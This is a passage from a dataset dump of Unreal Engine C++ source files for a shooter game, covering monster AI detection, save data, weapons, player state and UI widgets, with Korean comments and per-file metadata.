<DrawDebugHelpers.h>\n\nUBTService_MonDetect::UBTService_MonDetect()\n{\n\n}\n\nvoid UBTService_MonDetect::TickNode(UBehaviorTreeComponent& OwnerComp, uint8* NodeMemory, float DeltaSeconds)\n{\n\tSuper::TickNode(OwnerComp, NodeMemory, DeltaSeconds);\n\n\tAPawn* ControllingPawn = OwnerComp.GetAIOwner()->GetPawn();\n\tABCHECK(nullptr != ControllingPawn);\n\n\tUWorld* World = ControllingPawn->GetWorld();\n\tFVector Center = ControllingPawn->GetActorLocation();\n\tABCHECK(nullptr != World);\n\n\tint32 nMDetectRange = OwnerComp.GetBlackboardComponent()->GetValueAsInt(APG_AICon_Mon::DetectRangeKey);\n\tint32 nMChaseRange = OwnerComp.GetBlackboardComponent()->GetValueAsInt(APG_AICon_Mon::ChaseRangeKey);\n\n\tfloat fRange = (float)(OwnerComp.GetBlackboardComponent()->GetValueAsObject(APG_AICon_Mon::TargetKey) ? nMChaseRange : nMDetectRange);\n\n\t// AI 최적화 적용\n\t// 몬스터 시야거리 외 불필요한 콜리전 체크를 막는다.\n\tauto DefaultObject = World->GetFirstPlayerController()->GetCharacter();\n\tif (DefaultObject)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(DefaultObject->GetActorLocation(), Center));\n\t\tif (fDistance > fRange)\n\t\t{\n\t\t\tif (ControllingPawn->GetActorEnableCollision())\n\t\t\t\tControllingPawn->SetActorEnableCollision(false);\n\n\t\t\tif (ControllingPawn->IsActorTickEnabled())\n\t\t\t\tControllingPawn->SetActorTickEnabled(false);\n\n\t\t\treturn;\n\t\t}\n\t}\n\n\tif (false == ControllingPawn->GetActorEnableCollision())\n\t\tControllingPawn->SetActorEnableCollision(true);\n\n\tif (false == ControllingPawn->IsActorTickEnabled())\n\t\tControllingPawn->SetActorTickEnabled(true);\n\n\tTArray<FOverlapResult> OverlapResults;\n\tFCollisionQueryParams CollisionQueryParms(NAME_None, false, ControllingPawn);\n\tbool bResult = World->OverlapMultiByChannel(\n\t\tOverlapResults,\n\t\tCenter,\n\t\tFQuat::Identity,\n\t\tECollisionChannel::ECC_GameTraceChannel2,\n\t\tFCollisionShape::MakeSphere(fRange),\n\t\tCollisionQueryParms\n\t);\n\n\tif (bResult)\n\t{\n\t\tfor (auto& OverlapResult : OverlapResults)\n\t\t{\n\t\t\tAPG_MyChar* MyCharacter = Cast<APG_MyChar>(OverlapResult.GetActor());\n\t\t\tif (MyCharacter && MyCharacter->GetController()->IsPlayerController())\n\t\t\t{\n\t\t\t\tOwnerComp.GetBlackboardComponent()->SetValueAsObject(APG_AICon_Mon::TargetKey, MyCharacter);\n\t\t\t\t//DrawDebugSphere(World, Center, fRange, 16, FColor::Green, false, 0.2f);\n\t\t\t\t//DrawDebugPoint(World, MyCharacter->GetActorLocation(), 10.0f, FColor::Blue, false, 0.2f);\n\t\t\t\t//DrawDebugLine(World, ControllingPawn->GetActorLocation(), MyCharacter->GetActorLocation(), FColor::Blue, false, 0.2f);\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tOwnerComp.GetBlackboardComponent()->SetValueAsObject(APG_AICon_Mon::TargetKey, nullptr);\n\t}\n\telse\n\t{\n\t\t// Can't Find Character\n\t\tOwnerComp.GetBlackboardComponent()->ClearValue(APG_AICon_Mon::TargetKey);\n\t}\n\n\t//DrawDebugSphere(World, Center, fRange, 16, FColor::Red, false, 0.2f);\n}" }, { "alpha_fraction": 0.740634024143219, "alphanum_fraction": 0.7550432085990906, "avg_line_length": 18.33333396911621, "blob_id": "c9aac3b21ef645a039110665550c895cc2585855", "content_id": "689d0417edff445749070c06a19bac202a10db6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 349, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/Source/Project_Gun/Private/SaveData/PG_SaveStageData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in 
the Description page of Project Settings.\n\n#include \"SaveData/PG_SaveStageData.h\"\n\nUPG_SaveStageData::UPG_SaveStageData()\n{\n\n}\n\nFString UPG_SaveStageData::GetSlotName(int32 a_nStageID)\n{\n\treturn FString::Printf(TEXT(\"SaveStageData_%d\"), a_nStageID);\n}\n\nint32 UPG_SaveStageData::GetPlayerIndex()\n{\n\treturn 0;\n}" }, { "alpha_fraction": 0.7885952591896057, "alphanum_fraction": 0.7913768887519836, "avg_line_length": 28.97916603088379, "blob_id": "f21e1193292f12523b3465d72313a93ea3b411fc", "content_id": "6f4f07206f990683aff695ffa6b78a36c6dc1d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 104, "num_lines": 48, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeMainLobby.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\nAPG_GameModeMainLobby::APG_GameModeMainLobby()\n{\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n}\n\nvoid APG_GameModeMainLobby::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nbool APG_GameModeMainLobby::IsClearMission(enum EStageClearType a_ekStageClearType)\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tconst FPGStageData*\tcpStageData = pGameInstance->GetTableStageData(m_pSelectSaveStageData->m_nStageID);\n\tABCHECK(nullptr != cpStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn m_pSelectSaveStageData->m_bWasClearAmount;\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn m_pSelectSaveStageData->m_bWasClearTime;\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn m_pSelectSaveStageData->m_bWasClearLethal;\n\t}\n\n\treturn false;\n}\n\nvoid APG_GameModeMainLobby::SaveWeaponEquipSlot(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData);\n\tm_pSavePlayerData->m_kEquipWeaponTableIndex[nSlotIndex] = nWeaponIndex;\n\n\tABCHECK(SavePlayerData());\n}" }, { "alpha_fraction": 0.7610823512077332, "alphanum_fraction": 0.7610823512077332, "avg_line_length": 25.72307777404785, "blob_id": "4eda0a5770d292cc9fff85bf528e1af711682a33", "content_id": "22f1cb09f7398d7ca47ad5d3a8ce1872f2275fb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 109, "num_lines": 65, "path": "/Source/Project_Gun/Public/Anim/PG_AnimIns_MyChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Animation/AnimInstance.h>\n#include \"PG_AnimIns_MyChar.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE(FOnFireDelegate);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_AnimIns_MyChar : public UAnimInstance\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_AnimIns_MyChar();\n\tvirtual void NativeUpdateAnimation(float DeletaSeconds) override;\n\n\tbool IsVaildTargetMonster();\t// 몬스터 타겟팅 되어있는지 여부\n\tbool 
IsAimingComplete();\t\t// 조준완료 여부\n\n\tvoid SetRotation(float fYaw);\n\tvoid SetMontageFireReaction(UAnimMontage* AnimMontage);\n\npublic :\n\tUFUNCTION()\n\tvoid OnTargetMonster(class APG_MonChar* pTarget);\n\n\t\n\npublic :\n\tFOnFireDelegate OnFire;\n\n\tUFUNCTION()\n\tvoid AnimNotify_Fire();\n\nprivate :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat CurrentPawnSpeed;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat CurrentPawnSpeedRatio;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat fAimYaw;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat fAimPitch;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tclass APG_MonChar* TargetMonster;\n\n\t// 무기 발사 몽타주\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Animation\", Meta = (AllowPrivateAccess = true))\n\tUAnimMontage* MontageFireReaction;\n\n\t//UPROPERTY(EditAnywhere, BlueprintReadOnly, Category = Pawn, Meta = (AllowPrivateAccess = true))\n\t//bool IsDead;\n};\n" }, { "alpha_fraction": 0.5516356825828552, "alphanum_fraction": 0.5516356825828552, "avg_line_length": 29.568628311157227, "blob_id": "4fa71b570b1d8a0ff20b184e9193d4e627bddf71", "content_id": "aa90db3b32d117a7cdd30e27527ea432e8d8828f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 97, "num_lines": 51, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeStage.generated.h\"\n\n/**\n * GameMode : 레벨당 한 개의 게임 모드를 가지며 게임의 룰을 정의한다.\n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeStage : public APG_GameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_GameModeStage();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void PostLogin(APlayerController* NewPlayer) override;\n\tvirtual void BeginPlay() override;\n\npublic :\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(EStageClearType a_ekStageClearType) override;\t\t// 현재 각 타입의 미션 클리어 여부\n\tbool IsWasClearMisiion(EStageClearType a_ekStageClearType);\t\t\t\t\t\t// 이전에 각 타입의 미션 클리어 여부\n\tbool IsStageClear();\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// 스테이지 클리어 여부\n\n\t//===================================================\n\t// Save Data\n\t//===================================================\n\tvirtual bool SavePlayerData() override;\n\tvirtual bool SaveStageData() override;\n\npublic:\n\t//============================================\n\t// 플레이어 데이터 (Player)\n\t//============================================\n\tbool SetSavePlayerData(const struct FPGPlayerData& a_rkPlayerData);\n\n\t//============================================\n\t// 스테이지 데이터 (Stage)\n\t//============================================\n\tbool SetSaveStageData(const struct FPGStagePlayData& a_rkStagePlayData);\n\n};\n" }, { "alpha_fraction": 
0.7524752616882324, "alphanum_fraction": 0.7536633610725403, "avg_line_length": 24.00990104675293, "blob_id": "86b0abaafd45e09005872a7824d1c47696cdb37f", "content_id": "f97bba576a1e1ea9b8f25fcc54b9a22a5d862dbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2601, "license_type": "no_license", "max_line_length": 112, "num_lines": 101, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponFlameGun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponFlameGun.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n#include \"Character/PG_MonChar.h\"\n\nAPG_WeaponFlameGun::APG_WeaponFlameGun()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n}\n\nvoid APG_WeaponFlameGun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t}\n}\n\nvoid APG_WeaponFlameGun::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (nullptr != CurrFireFlame)\n\t\tFlameLength += DeltaTime;\n}\n\nvoid APG_WeaponFlameGun::Destroyed()\n{\n\tRemoveCurrFireFlame();\n\tSuper::Destroyed();\n}\n\nvoid APG_WeaponFlameGun::Fire()\n{\n\tFName\t\tSocketFire(TEXT(\"Socket_Fire_0\"));\n\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\tif (nullptr != CurrFireFlame)\n\t{\n\t\tRemoveCurrFireFlame();\n\t}\n\n\tUWorld* World = GetWorld();\n\tif (World)\n\t{\n\t\tFActorSpawnParameters SpawnParams;\n\t\tSpawnParams.Owner = this;\n\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\tCurrFireFlame = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\tABCHECK(nullptr != CurrFireFlame);\n\n\t\t// 발사 방향을 알아냅니다.\n\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t// 몬스터가 사용하는 무기 여부\n\t\tbool bMonsterWeapon = (nullptr != Cast<APG_MonChar>(GetOwner()));\n\n\t\tCurrFireFlame->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\tCurrFireFlame->AttachToActor(this, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\n\t\tauto ProjectileFlame = Cast<APG_ProjectileFlame>(CurrFireFlame);\n\t\tif (ProjectileFlame)\n\t\t\tProjectileFlame->SetScaleTime(FlameLength);\n\t}\n\n\tif (FiringEffect && false == FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(true, true);\n\n\tif (FireSound && false == FireSound->IsActive())\n\t\tFireSound->Play();\n}\n\nvoid APG_WeaponFlameGun::StopFire()\n{\n\tFlameLength = 0.0f;\n\n\tif (FiringEffect && FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(false);\n\n\tif (FireSound && FireSound->IsActive())\n\t\tFireSound->Stop();\n\n\tRemoveCurrFireFlame();\n}\n\nvoid APG_WeaponFlameGun::RemoveCurrFireFlame()\n{\n\tif (CurrFireFlame)\n\t{\n\t\tCurrFireFlame->DetachFromActor(FDetachmentTransformRules::KeepRelativeTransform);\n\t\tCurrFireFlame->Destroy();\n\t}\n}" }, { "alpha_fraction": 0.7789165377616882, "alphanum_fraction": 0.7789165377616882, "avg_line_length": 23.428571701049805, "blob_id": "02b6066c0a5ce498abb33300b0aff839b1817eef", "content_id": "de1519bda16704652645f81097e0dc4217166d82", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 685, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetSkillSlot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetSkillSlot.h\"\n\n#include <Components/Overlay.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetSkillSlot::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnSkill);\n\tPG_WIDGET_LINK(UOverlay, OverlayLightBox);\n}\n\nvoid UPG_UserWidgetSkillSlot::SetEnable(bool bEnable)\n{\n\tABCHECK(nullptr != m_pkBtnSkill);\n\tABCHECK(nullptr != m_pkOverlayLightBox);\n\n\tm_pkBtnSkill->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\telse\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7379679083824158, "alphanum_fraction": 0.7419785857200623, "avg_line_length": 22.375, "blob_id": "fd185ee304b0bc4e14acf1a40ab550544e2533f6", "content_id": "e1ec793a63f00038d61d0c4bc6ccccd006476fae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 832, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": "/Source/Project_Gun/Public/Game/Console/Commands/PG_Command.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PG_Command\n{\npublic:\n\tPG_Command();\n\tvirtual ~PG_Command();\n\npublic :\n\tvirtual void Init(class IConsoleVariable* pConsoleVariable);\n\tvirtual void UpdateCommand() = 0;\t\t// 매 틱마다 커맨드가 업데이트 되었는지 확인한다.\n\tvirtual void Excute() = 0;\t\t\t\t// 커맨드 실행\n\tvirtual void OnChangeCommand() = 0;\t\t// 해당 커맨드가 입력이 되었음을 알린다.\n\n\tclass IConsoleVariable* GetConsoleVariable() { return m_pConsoleVariable; }\n\npublic:\n\tstatic void OnUpdateConsoleValue(IConsoleVariable* pConsoleVariable);\n\t\nprotected :\n\tclass IConsoleVariable*\t\tm_pConsoleVariable = nullptr;\n\nprivate :\n\tFConsoleVariableDelegate\tOnConsoleVariableDelegate;\n};\n" }, { "alpha_fraction": 0.7363636493682861, "alphanum_fraction": 0.7363636493682861, "avg_line_length": 17.33333396911621, "blob_id": "1db1098cb4e82c6624b7c81d6cf0b23a73ae18ed", "content_id": "ce11fd008d3834787f100ef932925733f044ea7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 442, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Public/Game/Console/Commands/PG_CommandStartStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"PG_Command.h\"\n\n/**\n * \n */\nclass PG_CommandStartStage : public PG_Command\n{\npublic:\n\tPG_CommandStartStage();\n\t~PG_CommandStartStage();\n\npublic:\n\tvirtual void UpdateCommand() override;\n\tvirtual void Excute() override;\n\tvirtual void OnChangeCommand() override;\n\nprivate:\n\tbool bOnCommand = false;\n};\n" }, { "alpha_fraction": 0.6181702613830566, "alphanum_fraction": 0.6194409132003784, "avg_line_length": 
29.269229888916016, "blob_id": "c018aafb58d45ac6d27dcf9445ccbd9f7115bb02", "content_id": "a8475b5c6b83d5f6157b9d633c1e6ee6950dce69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1696, "license_type": "no_license", "max_line_length": 122, "num_lines": 52, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentDash.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentDash.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnDashEnd);\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentDash : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's properties\n\tUPG_ComponentDash();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\t//====================================================================\n\t// vDashTargetPos : 대쉬 할 타겟의 위치\n\t// fRunTime : 대쉬 최종 목표지점까지 이동시간\n\t//====================================================================\n\tbool SetupDashData(FVector vDashTargetPos, float fMoveDistance, float fDashSpeed);\n\n\t//====================================================================\n\t// StartDash() 함수 이용전 반드시 SetupDashData() 함수로 데이터 설정 후 사용할 것\n\t//====================================================================\n\tvoid StartDash();\n\tvoid StopDash();\n\tbool IsDash();\n\npublic :\n\tFOnDashEnd OnDashEnd;\n\nprivate :\n\tvoid UpdateDashLocation(float fDeltaTime);\n\nprivate :\n\tbool\tm_bActiveDash = false;\t\t\t\t// 대쉬중 여부\n\tfloat\tm_fDashSpeed = 0.0f;\n\tFVector m_vDashDir = FVector::ZeroVector;\t// 대쉬방향 (Nomalize)\n\tFVector m_vGoalPos = FVector::ZeroVector;\t// 최종 이동 목표지점\n};\n" }, { "alpha_fraction": 0.5385427474975586, "alphanum_fraction": 0.5422386527061462, "avg_line_length": 36.50495147705078, "blob_id": "534268ed2fca3d6240e4dd94b94e569e39814d6e", "content_id": "4261def8888255db10d7397efb7209d62c0e89bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4376, "license_type": "no_license", "max_line_length": 110, "num_lines": 101, "path": "/Source/Project_Gun/Public/Player/PlayerState/PG_MyPlayerState.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/PlayerState.h>\n#include \"PG_MyPlayerState.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnUpdateRewardPoint);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnAddRewardPoint, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnMonsterKill, class APG_MonChar*);\nDECLARE_MULTICAST_DELEGATE(FOnReadyToUseTheLethalAttack);\nDECLARE_MULTICAST_DELEGATE(FOnTryUseTheLethalAttack);\nDECLARE_MULTICAST_DELEGATE(FOnUseTheLethalAttackFail);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnChangeWeapon, int32);\n\n/**\n * PlayerState : 플레이어의 상태를 정의한다. 플레이어의 캐릭터가 무슨 직업인지, 이름은 무엇인지 등을 포함한다.\n * -. 
남들이 알아야하는 내 정보 (멀티플레이 환경에 의미가 더 도드라진다)\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MyPlayerState : public APlayerState\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MyPlayerState();\n\t\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\n\npublic :\n\tbool InitPlayerData();\t\t// 스테이지 시작전 플레이어 데이터를 초기화한다.\n\n\t//==========================================================\n\t// Reward Point\n\t//==========================================================\n\tvoid AddRewardPoint(int32 a_nAddPoint);\n\tvoid SetRewardPoint(int32 a_nSetPoint);\n\tUFUNCTION(BlueprintCallable, Category = \"PG RewardPoint\")\n\tint32 GetRewardPoint() { return m_kPlayingPlayerData.RewardPoint; }\n\n\t//==========================================================\n\t// PlayerData\n\t//==========================================================\n\tconst FPGPlayerData* GetOriginalPlayerData() { return &m_kOrignalPlayerData; }\t\t// 스테이지 플레이하기전 오리지널 플레이어 데이터\n\tconst FPGPlayerData* GetPlayingPlayerData() { return &m_kPlayingPlayerData; }\t\t// 스테이지 플레이 시작 후 변경되는 플레이어 데이터\n\n\t//==========================================================\n\t// Monster\n\t//==========================================================\n\tvoid MonsterKill(class APG_MonChar* KillMon);\n\tvoid MonsterLethalAttackKill(class APG_MonChar* KillMon);\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tbool UseAmmo();\t\t\t\t\t// 현재 장찬된 무기의 탄약 소비\n\tvoid ChangeDefaultWeapon();\t\t// 기본 무기로 변경\n\tbool ChangeWeapon(int32 nSlotIndex, int32 nWeaponTableIndex);\t// 무기 변경\n\n\t//==========================================================\n\t// Lethal Attack\n\t//==========================================================\n\tvoid ReadyToUseTheSkill();\t\t// 필살기 사용 준비\n\tvoid TryUseTheSkill();\t\t\t// 필살기 사용 시도\n\npublic :\n\t//==========================================================\n\t// Point\n\t//==========================================================\n\tFOnUpdateRewardPoint\tOnUpdateRewardPoint;\t\t\t// 포인트 획득 (몬스터 킬 + 스테이지 클리어 획득 재화 포함)\n\tFOnAddRewardPoint\t\tOnKillAddRewardPoint;\t\t\t// 몬스터 처치로 인한 포인트 획득 (스테이지 클리어 획득 재화 미포함)\n\n\t//==========================================================\n\t// Monster\n\t//==========================================================\n\tFOnMonsterKill\t\t\tOnDefaultAttackMonsterKill;\t\t// 일반공격으로 인한 몬스터 처치\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tFOnReadyToUseTheLethalAttack\tOnReadyToUseTheLethalAttack;\t// 스킬 사용 준비\n\tFOnTryUseTheLethalAttack\t\tOnTryUseTheLethalAttack;\t\t// 스킬 사용 시도\n\tFOnUseTheLethalAttackFail\t\tOnUseTheLethalAttackFail;\t\t// 스킬 사용 실패\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tFOnChangeWeapon OnChangeWeapon;\t\t// 무기 교체 알림\n\nprotected :\n\t// 스테이지 플레이중 변경되는 플레이어 데이터\n\tUPROPERTY(Transient, VisibleAnywhere)\n\tstruct FPGPlayerData m_kPlayingPlayerData;\n\n\t// 스테이지 시작시 변하지 않는 원본 플레이어 데이터\n\tUPROPERTY(Transient, VisibleAnywhere)\n\tstruct FPGPlayerData m_kOrignalPlayerData;\n};\n" }, { "alpha_fraction": 0.7630103826522827, "alphanum_fraction": 0.7710168361663818, "avg_line_length": 23.019229888916016, "blob_id": "a3c8fdaf642282bdfa1676ba8d7fe85e6f3ce39c", "content_id": "8f9c88c3301dc0c811bc9f40f1049bcc21b3aec8", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "C++", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayMissionState.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetPlayMissionState.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayMissionState : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid UpdateMissionFlag();\n\tvoid UpdateMissionLethal();\n\tvoid UpdateMissionTime();\n\n\tvoid SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataTime(bool bClear, int32 nCurrTime);\n\nprotected:\n\t// 현재 몬스터 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateFlag();\n\t// 몬스터 필살기 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateLethal();\n\t// 타이머 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateTime();\n\nprotected:\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrLethal);\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrTime);\n\n\tPG_WIDGET_DECLAR(UTextBlock, TextMaxFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMaxLethal);\n};\n" }, { "alpha_fraction": 0.7993355393409729, "alphanum_fraction": 0.8011074066162109, "avg_line_length": 36.00819778442383, "blob_id": "1dc23f1d68ec6f9bf10f5a9596926523830696cc", "content_id": "2a8846b2c7d97557235d3c23f0d55499fb1f0054", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4723, "license_type": "no_license", "max_line_length": 204, "num_lines": 122, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileRifle.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileRifle.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MyChar.h\"\n\n// Sets default values\nAPG_ProjectileRifle::APG_ProjectileRifle()\n{\n \t// Set this actor to call Tick() every frame. 
